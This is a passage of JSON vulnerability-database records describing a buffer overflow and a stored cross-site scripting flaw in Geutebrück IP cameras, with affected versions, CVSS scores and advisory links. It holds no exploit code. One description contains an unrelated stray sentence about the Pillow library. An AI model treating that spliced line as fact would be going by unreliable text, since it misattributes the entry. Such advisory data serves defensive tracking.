            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33545",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "id": "VAR-202109-0598",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T19:32:01.831000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158072"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33545"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "date": "2021-09-13T18:15:21.720000",
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "date": "2021-09-27T14:30:38.633000",
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1488

    Vulnerability from variot - Updated: 2024-12-28 22:51

    Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user’s browser. A cross-site scripting vulnerability exists in Geutebruck IP Camera G-Code and G-Cam. Information may be obtained and tampered with. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the web application not properly validating client-supplied data. Attackers can use this vulnerability to execute client-side code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior; G-Cam EBC-21xx version 1.12.0.25 and prior; G-Cam EFD-22xx version 1.12.0.25 and prior; G-Cam ETHC-22xx version 1.12.0.25 and prior; G-Cam EWPC-22xx version 1.12.0.25 and prior.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1488",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10957",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2019-10957",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2020-22347",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2019-10957",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2019-10957",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10957",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10957",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22347",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-090",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-10957",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user\u2019s browser. A cross-site scripting vulnerability exists in Geutebruck IP Camera G-Code and G-Cam. Information may be obtained and information may be tampered with. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the lack of proper verification of client data by the web application. Attackers can use this vulnerability to execute client-side code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-10957",
            "trust": 4.2
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "id": "VAR-202001-1488",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          }
        ]
      },
      "last_update_date": "2024-12-28T22:51:07.576000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code cross-site scripting vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213551"
          },
          {
            "title": "Multiple Geutebr\u00fcck Fixes for product cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93179"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Cross-site scripting (CWE-79) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.6,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10957"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.securityfocus.com/bid/108579"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162091"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
